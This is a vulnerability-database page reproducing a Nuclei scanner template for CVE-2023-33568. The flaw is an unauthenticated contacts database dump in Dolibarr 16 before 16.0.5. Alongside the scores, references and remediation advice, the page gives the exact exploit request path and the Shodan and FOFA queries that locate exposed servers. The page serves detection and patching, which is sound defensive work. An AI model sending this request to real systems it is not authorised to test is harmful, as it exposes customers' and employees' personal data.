ProjectDiscoveryNUCLEI:CVE-2023-33568Dolibarr Unauthenticated Contacts Database Theft
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.569 Medium
EPSS
Percentile
97.7%
An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.
id: CVE-2023-33568
info:
name: Dolibarr Unauthenticated Contacts Database Theft
author: DhiyaneshDK
severity: high
description: |
An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists.
impact: |
The attacker can access and steal sensitive information from the contacts database, potentially leading to data breaches and privacy violations.
remediation: |
Apply the latest security patch or upgrade to a patched version of Dolibarr to mitigate the vulnerability.
reference:
- https://www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/
- https://nvd.nist.gov/vuln/detail/CVE-2023-33568
- https://github.com/Dolibarr/dolibarr/commit/bb7b69ef43673ed403436eac05e0bc31d5033ff7
- https://github.com/Dolibarr/dolibarr/commit/be82f51f68d738cce205f4ce5b469ef42ed82d9e
- https://www.dolibarr.org/forum/t/dolibarr-16-0-security-breach/23471
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2023-33568
cwe-id: CWE-552
epss-score: 0.4855
epss-percentile: 0.97483
cpe: cpe:2.3:a:dolibarr:dolibarr_erp\/crm:*:*:*:*:*:*:*:*
metadata:
verified: "true"
max-request: 1
vendor: dolibarr
product: dolibarr_erp\/crm
shodan-query: http.favicon.hash:440258421
fofa-query: icon_hash=440258421
tags: cve2023,cve,dolibarr,unauth
http:
- method: GET
path:
- "{{BaseURL}}/public/ticket/ajax/ajax.php?action=getContacts&email=%"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"database_name":'
- '"database_user":'
condition: and
- type: status
status:
- 200
# digest: 490a004630440220134e0463102496737a2efd38625b6a7aeda5925f8f9924751b0917a46cc17d10022065a6e0e9df979a4efc3ee24912f2916fd08762932995091f79ea114ddf822664:922c64590222798bb761d5b6d8e72950References
github.com/Dolibarr/dolibarr/commit/bb7b69ef43673ed403436eac05e0bc31d5033ff7
github.com/Dolibarr/dolibarr/commit/be82f51f68d738cce205f4ce5b469ef42ed82d9e
nvd.nist.gov/vuln/detail/CVE-2023-33568
www.dolibarr.org/forum/t/dolibarr-16-0-security-breach/23471
www.dsecbypass.com/en/dolibarr-pre-auth-contact-database-dump/
Related
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
0.569 Medium
EPSS
Percentile
97.7%